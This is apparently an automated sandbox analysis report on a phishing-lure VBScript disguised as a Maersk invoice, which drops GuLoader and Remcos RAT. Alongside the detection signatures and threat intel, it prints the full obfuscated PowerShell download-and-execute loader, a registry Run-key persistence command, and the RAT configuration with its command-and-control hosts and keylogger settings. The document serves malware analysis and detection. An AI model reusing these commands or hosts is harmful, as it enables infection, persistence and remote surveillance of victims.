Edit tour

Windows Analysis Report
Maersk_BL_Invoice_Packinglist.vbs

Overview

General Information

Sample name:	Maersk_BL_Invoice_Packinglist.vbs
Analysis ID:	1465860
MD5:	43fe0e9069047cb153a3e86508d5a6ca
SHA1:	bb5431130b0b3441b9eda1e54bad3f56eb49f04c
SHA256:	bcd66ce1c9d8d1123249ef8240a6e7ef32662aaa897845e866627ee69b28dff1
Tags:	GuLoaderMaerskRATRemcosRATvbs
Infos:

Detection

GuLoader, Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Powershell download and execute

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Found suspicious powershell code related to unpacking or dynamic code loading

Installs a global keyboard hook

Obfuscated command line found

Potential malicious VBS script found (suspicious strings)

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Sample has a suspicious name (potential lure to open the executable)

Sigma detected: WScript or CScript Dropper

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Uses dynamic DNS services

Very long command line found

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6172 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 4412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,a,lM:FS,iLmEclo.nS= $.t r uTe, ') ;Unopportunely $Narcotisation205;Unopportunely (toddyernes 'HS t aMrMtM-,SAl e,e p. L4V ');Unopportunely (toddyernes ' $ gNlNo,b a l :CF.oOrOh,jSuHl,sE=P(,TNe.sUtN-VP.aItchP $APLaSrVdAoTnLnPe rUeUn d eP)D ') ;Unopportunely (toddyernes 'S$PgSlHo.bSa.l :,N.o nNm e,t,aIl lAuKr,g i.c,a,l.l yS= $,gBlKo,b aIl.:RJ,eOnMdCaP+ +F%G$PS k,a l a t r i,n nTeDtBsL.Bc o u nAtS ') ;$Siddembler=$Skalatrinnets[$Nonmetallurgically];}$Morderskers=325186;$Horehuset=25649;Unopportunely (toddyernes ' $Ug l o bBaLl :.TWeNtFr.i csa lEn e sDs. =T CGSedt -RCOo,n t,eOn tO k$MP a rLdSo nIn eFrOe n.d eS ');Unopportunely (toddyernes 'T$sgUlSolbIa l,:CF,uDsSoEbDaTc the rQi aA V=, ,[ SMySsPt eUm .JC oBnTvBeIrstK]O: : F rEo m BIa s eB6,4ES.tSr iSn gD( $.TPe,tPrLi cHaDlHn,e s s ) ');Unopportunely (toddyernes 'f$HgRlSo b aKlT:ER.eLtPtre.rbs.tSe.dUe.t.sB N=. N[ SFyJsUtBe,mH.WTAeFx t .UE,n cEoSd.iPnRg.] :G:PAOS,CGIBIS.,G.e,t S,t rAi nDg ( $LF.u sSo bKaacHt,eUrFi a )D ');Unopportunely (toddyernes ',$Gg l.o bSa.lJ: MLaBk.u,l.efr e tc=,$ R e.t tpeEr s tDeNd eUtLsS.FsSu b s tRrBi n gW( $ MFoPr d e r s.k eArEs ,B$SHkoSrSe,hBuBs,e,t )V ');Unopportunely $Makuleret;" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6160 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 6540 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,a,lM:FS,iLmEclo.nS= $.t r uTe, ') ;Unopportunely $Narcotisation205;Unopportunely (toddyernes 'HS t aMrMtM-,SAl e,e p. L4V ');Unopportunely (toddyernes ' $ gNlNo,b a l :CF.oOrOh,jSuHl,sE=P(,TNe.sUtN-VP.aItchP $APLaSrVdAoTnLnPe rUeUn d eP)D ') ;Unopportunely (toddyernes 'S$PgSlHo.bSa.l :,N.o nNm e,t,aIl lAuKr,g i.c,a,l.l yS= $,gBlKo,b aIl.:RJ,eOnMdCaP+ +F%G$PS k,a l a t r i,n nTeDtBsL.Bc o u nAtS ') ;$Siddembler=$Skalatrinnets[$Nonmetallurgically];}$Morderskers=325186;$Horehuset=25649;Unopportunely (toddyernes ' $Ug l o bBaLl :.TWeNtFr.i csa lEn e sDs. =T CGSedt -RCOo,n t,eOn tO k$MP a rLdSo nIn eFrOe n.d eS ');Unopportunely (toddyernes 'T$sgUlSolbIa l,:CF,uDsSoEbDaTc the rQi aA V=, ,[ SMySsPt eUm .JC oBnTvBeIrstK]O: : F rEo m BIa s eB6,4ES.tSr iSn gD( $.TPe,tPrLi cHaDlHn,e s s ) ');Unopportunely (toddyernes 'f$HgRlSo b aKlT:ER.eLtPtre.rbs.tSe.dUe.t.sB N=. N[ SFyJsUtBe,mH.WTAeFx t .UE,n cEoSd.iPnRg.] :G:PAOS,CGIBIS.,G.e,t S,t rAi nDg ( $LF.u sSo bKaacHt,eUrFi a )D ');Unopportunely (toddyernes ',$Gg l.o bSa.lJ: MLaBk.u,l.efr e tc=,$ R e.t tpeEr s tDeNd eUtLsS.FsSu b s tRrBi n gW( $ MFoPr d e r s.k eArEs ,B$SHkoSrSe,hBuBs,e,t )V ');Unopportunely $Makuleret;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 5308 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

wab.exe (PID: 6444 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

cmd.exe (PID: 6636 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6828 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "janbours92harbu02.duckdns.org:3980:0janbours92harbu02.duckdns.org:3981:1janbours92harbu03.duckdns.org:3980:0", "Assigned name": "XXL", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jmoughoe-DMPW3B", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kpburtts.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\kpburtts.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2307801127.000000000A152000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000A.00000002.2959075340.0000000005192000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: powershell.exe PID: 4412	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 4412	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x214d0b:$b2: ::FromBase64String( 0x22ea22:$b2: ::FromBase64String( 0x22ea5e:$b2: ::FromBase64String( 0x22ea9b:$b2: ::FromBase64String( 0x22ead9:$b2: ::FromBase64String( 0x22eb18:$b2: ::FromBase64String( 0x22eb58:$b2: ::FromBase64String( 0x22eb99:$b2: ::FromBase64String( 0x22ebdb:$b2: ::FromBase64String( 0x22ec1e:$b2: ::FromBase64String( 0x22ec62:$b2: ::FromBase64String( 0x22eca7:$b2: ::FromBase64String( 0x22eced:$b2: ::FromBase64String( 0x22ed34:$b2: ::FromBase64String( 0x22ed7c:$b2: ::FromBase64String( 0x22edc5:$b2: ::FromBase64String( 0x128f0b:$s1: -join 0x12b89e:$s1: -join 0x149b02:$s1: -join 0x156bd7:$s1: -join 0x159fa9:$s1: -join
Process Memory Space: powershell.exe PID: 6540	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6540	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x13f32e:$b2: ::FromBase64String( 0x104012:$s1: -join 0x104c29:$s1: -join 0x136da7:$s1: -join 0x2bff27:$s1: -join 0x2ccffc:$s1: -join 0x2d03ce:$s1: -join 0x2d0a80:$s1: -join 0x2d2571:$s1: -join 0x2d4777:$s1: -join 0x2d4f9e:$s1: -join 0x2d580e:$s1: -join 0x2d5f49:$s1: -join 0x2d5f7b:$s1: -join 0x2d5fc3:$s1: -join 0x2d5fe2:$s1: -join 0x2d6832:$s1: -join 0x2d69ae:$s1: -join 0x2d6a26:$s1: -join 0x2d6ab9:$s1: -join 0x2d6d1f:$s1: -join
Process Memory Space: wab.exe PID: 6444	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 2 entries

Other

Source	Rule	Description	Author	Strings
amsi64_4412.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_6540.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xd975:$b2: ::FromBase64String( 0xc9e5:$s1: -join 0x124b2:$s3: Reverse 0x6191:$s4: += 0x6253:$s4: += 0xa47a:$s4: += 0xc597:$s4: += 0xc881:$s4: += 0xc9c7:$s4: += 0x15731:$s4: += 0x157b1:$s4: += 0x15877:$s4: += 0x158f7:$s4: += 0x15acd:$s4: += 0x15b51:$s4: += 0xd214:$e4: Get-WmiObject 0xd403:$e4: Get-Process 0xd45b:$e4: Start-Process 0x163f3:$e4: Get-Process

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs", ProcessId: 6172, ProcessName: wscript.exe

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6444, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)", ProcessId: 6636, ProcessName: cmd.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6636, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)", ProcessId: 6828, ProcessName: reg.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6444, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)", ProcessId: 6636, ProcessName: cmd.exe

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: %Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs", ProcessId: 6172, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt 